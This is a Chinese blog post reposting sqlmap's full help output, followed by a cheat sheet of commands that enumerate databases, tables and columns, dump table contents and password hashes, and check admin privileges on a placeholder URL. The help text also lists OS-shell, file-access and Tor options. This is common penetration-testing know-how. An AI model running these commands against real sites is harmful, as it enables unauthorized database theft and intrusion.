常用Sqlmap命令指南
本文最后更新于2022天前,其中的信息可能已经有所发展或是发生改变。

I:sqlmap>python sqlmap.py -help        ___       __H__ ___ ___[,]_____ ___ ___  {1.3.2.20#dev}|_ -| . [,]     | .'| . ||___|_  ["]_|_|_|__,|  _|      |_|V...       |_|   http://sqlmap.org
Usage: sqlmap.py [options]
Options:  -h, --help            Show basic help message and exit  -hh                   Show advanced help message and exit  --version             Show program's version number and exit  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:    At least one of these options has to be provided to define the    target(s)
    -d DIRECT           Connection string for direct database connection    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file    -x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file    -m BULKFILE         Scan multiple targets given in a textual file    -r REQUESTFILE      Load HTTP request from a file    -g GOOGLEDORK       Process Google dork results as target URLs    -c CONFIGFILE       Load options from a configuration INI file
  Request:    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)    --data=DATA         Data string to be sent through POST (e.g. "id=1")    --param-del=PARA..  Character used for splitting parameter values (e.g. &)    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)    --load-cookies=L..  File containing cookies in Netscape/wget format    --drop-set-cookie   Ignore Set-Cookie header from response    --user-agent=AGENT  HTTP User-Agent header value    --random-agent      Use randomly selected HTTP User-Agent header value    --host=HOST         HTTP Host header value    --referer=REFERER   HTTP Referer header value    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")    --headers=HEADERS   Extra headers (e.g. "Accept-Language: frnETag: 123")    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)    --auth-cred=AUTH..  HTTP authentication credentials (name:password)    --auth-file=AUTH..  HTTP authentication PEM cert/private key file    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)    --ignore-proxy      Ignore system default proxy settings    --ignore-redirects  Ignore redirection attempts    --ignore-timeouts   Ignore connection timeouts    --proxy=PROXY       Use a proxy to connect to the target URL    --proxy-cred=PRO..  Proxy authentication credentials (name:password)    --proxy-file=PRO..  Load proxy list from a file    --tor               Use Tor anonymity network    --tor-port=TORPORT  Set Tor proxy port other than default    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))    --check-tor         Check to see if Tor is used properly    --delay=DELAY       Delay in seconds between each HTTP request    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)    --retries=RETRIES   Retries when the connection timeouts (default 3)    --randomize=RPARAM  Randomly change value for given parameter(s)    --safe-url=SAFEURL  URL address to visit frequently during testing    --safe-post=SAFE..  POST data to send to a safe URL    --safe-req=SAFER..  Load safe HTTP request from a file    --safe-freq=SAFE..  Test requests between two visits to a given safe URL    --skip-urlencode    Skip URL encoding of payload data    --csrf-token=CSR..  Parameter used to hold anti-CSRF token    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token    --force-ssl         Force usage of SSL/HTTPS    --hpp               Use HTTP parameter pollution method    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
  Optimization:    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches    --predict-output    Predict common queries output    --keep-alive        Use persistent HTTP(s) connections    --null-connection   Retrieve page length without actual HTTP response body    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  Injection:    These options can be used to specify which parameters to test for,    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)    --skip=SKIP         Skip testing for given parameter(s)    --skip-static       Skip testing parameters that not appear to be dynamic    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")    --dbms=DBMS         Force back-end DBMS to provided value    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)    --os=OS             Force back-end DBMS operating system to provided value    --invalid-bignum    Use big numbers for invalidating values    --invalid-logical   Use logical operations for invalidating values    --invalid-string    Use random strings for invalidating values    --no-cast           Turn off payload casting mechanism    --no-escape         Turn off string escaping mechanism    --prefix=PREFIX     Injection payload prefix string    --suffix=SUFFIX     Injection payload suffix string    --tamper=TAMPER     Use given script(s) for tampering injection data
  Detection:    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)    --risk=RISK         Risk of tests to perform (1-3, default 1)    --string=STRING     String to match when query is evaluated to True    --not-string=NOT..  String to match when query is evaluated to False    --regexp=REGEXP     Regexp to match when query is evaluated to True    --code=CODE         HTTP code to match when query is evaluated to True    --text-only         Compare pages based only on the textual content    --titles            Compare pages based only on their titles
  Techniques:    These options can be used to tweak testing of specific SQL injection    techniques
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection    --union-char=UCHAR  Character to use for bruteforcing number of columns    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection    --dns-domain=DNS..  Domain name used for DNS exfiltration attack    --second-url=SEC..  Resulting page URL searched for second-order response    --second-req=SEC..  Load second-order HTTP request from file
  Fingerprint:    -f, --fingerprint   Perform an extensive DBMS version fingerprint
  Enumeration:    These options can be used to enumerate the back-end database    management system information, structure and data contained in the    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything    -b, --banner        Retrieve DBMS banner    --current-user      Retrieve DBMS current user    --current-db        Retrieve DBMS current database    --hostname          Retrieve DBMS server hostname    --is-dba            Detect if the DBMS current user is DBA    --users             Enumerate DBMS users    --passwords         Enumerate DBMS users password hashes    --privileges        Enumerate DBMS users privileges    --roles             Enumerate DBMS users roles    --dbs               Enumerate DBMS databases    --tables            Enumerate DBMS database tables    --columns           Enumerate DBMS database table columns    --schema            Enumerate DBMS schema    --count             Retrieve number of entries for table(s)    --dump              Dump DBMS database table entries    --dump-all          Dump all DBMS databases tables entries    --search            Search column(s), table(s) and/or database name(s)    --comments          Check for DBMS comments during enumeration    -D DB               DBMS database to enumerate    -T TBL              DBMS database table(s) to enumerate    -C COL              DBMS database table column(s) to enumerate    -X EXCLUDE          DBMS database identifier(s) to not enumerate    -U USER             DBMS user to enumerate    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables    --pivot-column=P..  Pivot column name    --where=DUMPWHERE   Use WHERE condition while table dumping    --start=LIMITSTART  First dump table entry to retrieve    --stop=LIMITSTOP    Last dump table entry to retrieve    --first=FIRSTCHAR   First query output word character to retrieve    --last=LASTCHAR     Last query output word character to retrieve    --sql-query=QUERY   SQL statement to be executed    --sql-shell         Prompt for an interactive SQL shell    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:    These options can be used to run brute force checks
    --common-tables     Check existence of common tables    --common-columns    Check existence of common columns
  User-defined function injection:    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions    --shared-lib=SHLIB  Local path of the shared library
  File system access:    These options can be used to access the back-end database management    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system    --file-write=FIL..  Write a local file on the back-end DBMS file system    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:    These options can be used to access the back-end database management    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command    --os-shell          Prompt for an interactive operating system shell    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC    --os-bof            Stored procedure buffer overflow exploitation    --priv-esc          Database process user privilege escalation    --msf-path=MSFPATH  Local path where Metasploit Framework is installed    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:    These options can be used to access the back-end database management    system Windows registry
    --reg-read          Read a Windows registry key value    --reg-add           Write a Windows registry key value data    --reg-del           Delete a Windows registry key value    --reg-key=REGKEY    Windows registry key    --reg-value=REGVAL  Windows registry key value    --reg-data=REGDATA  Windows registry key value data    --reg-type=REGTYPE  Windows registry key value type
  General:    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file    -t TRAFFICFILE      Log all HTTP traffic into a textual file    --batch             Never ask for user input, use the default behavior    --binary-fields=..  Result fields having binary values (e.g. "digest")    --check-internet    Check Internet connection before assessing the target    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)    --eta               Display for each output the estimated time of arrival    --flush-session     Flush session files for current target    --forms             Parse and test forms on target URL    --fresh-queries     Ignore query results stored in session file    --har=HARFILE       Log all HTTP traffic into a HAR file    --hex               Use hex conversion during data retrieval    --output-dir=OUT..  Custom output directory path    --parse-errors      Parse and display DBMS error messages from responses    --save=SAVECONFIG   Save options to a configuration INI file    --scope=SCOPE       Regexp to filter targets from provided proxy log    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)    --update            Update sqlmap
  Miscellaneous:    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")    --alert=ALERT       Run host OS command(s) when SQL injection is found    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")    --beep              Beep on question and/or when SQL injection is found    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables    --dependencies      Check for missing (optional) sqlmap dependencies    --disable-coloring  Disable console output coloring    --gpage=GOOGLEPAGE  Use Google dork results from specified page number    --identify-waf      Make a thorough testing for a WAF/IPS protection    --list-tampers      Display list of available tamper scripts    --mobile            Imitate smartphone through HTTP User-Agent header    --offline           Work in offline mode (only use session data)    --purge             Safely remove all content from sqlmap data directory    --skip-waf          Skip heuristic detection of WAF/IPS protection    --smart             Conduct thorough tests only if positive heuristic(s)    --sqlmap-shell      Prompt for an interactive sqlmap shell    --tmp-dir=TMPDIR    Local directory for storing temporary files    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")    --wizard            Simple wizard interface for beginner users

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"–dbs

//获取数据库

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-db

//获取当前数据库名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-user

//获取当前数据库的用户名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables

//获取数据库的表名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables -D r3550c17g3

//获取指定数据库中的表名

sqlmap.py -u "" --columns -Tmanage_user -D r3550c17g3

//获取指定表中的列名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--dump -C manage_name -T manage_user -D r3550c17g3

//获取指定列名中的字段

总  结

常用语句:

sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"

sqlmap.py -u "[URL]" –dbs    //获取数据库

sqlmap.py -u "[URL]" --current-db    //获取当前数据库名

sqlmap.py -u "[URL]" --current-user    //获取当前数据库的用户名

sqlmap.py -u "[URL]" --tables    //获取数据的所有表名

sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的所有表名

sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段

sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段

sqlmap.py -u "[URL]" --privileges     //查看当前数据库的用户权限

sqlmap.py -u "[URL]" --password    //爆数据库的密码

sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限

本文来源于互联网:常用Sqlmap命令指南

点击数:121

    评论

    1. 1423132
      Windows Chrome 74.0.3729.169
      6年前
      2019-5-28 2:27:40

      重要:https://www.cnblogs.com/blacksunny/p/8060028.html

    发送评论 编辑评论

    
    				
    |´・ω・)ノ
    ヾ(≧∇≦*)ゝ
    (☆ω☆)
    (╯‵□′)╯︵┴─┴
     ̄﹃ ̄
    (/ω\)
    ∠( ᐛ 」∠)_
    (๑•̀ㅁ•́ฅ)
    →_→
    ୧(๑•̀⌄•́๑)૭
    ٩(ˊᗜˋ*)و
    (ノ°ο°)ノ
    (´இ皿இ`)
    ⌇●﹏●⌇
    (ฅ´ω`ฅ)
    (╯°A°)╯︵○○○
    φ( ̄∇ ̄o)
    ヾ(´・ ・`。)ノ"
    ( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
    (ó﹏ò。)
    Σ(っ °Д °;)っ
    ( ,,´・ω・)ノ"(´っω・`。)
    ╮(╯▽╰)╭
    o(*////▽////*)q
    >﹏<
    ( ๑´•ω•) "(ㆆᴗㆆ)
    😂
    😀
    😅
    😊
    🙂
    🙃
    😌
    😍
    😘
    😜
    😝
    😏
    😒
    🙄
    😳
    😡
    😔
    😫
    😱
    😭
    💩
    👻
    🙌
    🖕
    👍
    👫
    👬
    👭
    🌚
    🌝
    🙈
    💊
    😶
    🙏
    🍦
    🍉
    😣
    Source: github.com/k4yt3x/flowerhd
    颜文字
    Emoji
    小恐龙
    花!
    上一篇
    下一篇